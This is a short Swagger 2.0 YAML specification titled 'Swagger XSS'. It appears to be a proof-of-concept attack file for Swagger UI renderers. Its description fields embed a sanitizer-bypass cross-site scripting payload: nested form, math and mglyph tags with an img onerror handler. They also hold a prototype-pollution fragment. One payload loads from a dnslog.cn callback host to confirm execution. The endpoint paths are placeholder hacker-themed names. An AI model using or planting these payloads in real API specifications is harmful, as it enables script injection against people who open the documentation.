swagger: '2.0'
info:
  title: Swagger XSS 
  description: |
    <form><form><math><mglyph><img src=http://hoqqq7.dnslog.cn onerror=alert(1)></mglyph></math></form></form>`, pre: () => { Object.prototype.depth = -1; }
  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /M0X0101:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - M4ST3R MIND
      operationId: findAccounts
      summary: Finds all accounts
  '/hack/hachid/{id}':
    delete:
      parameters:
        - description: |
            <form><form><math><mglyph><img src=x onerror=alert(1)></mglyph></math></form></form>`, pre: () => { Object.prototype.depth = -1; }
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified

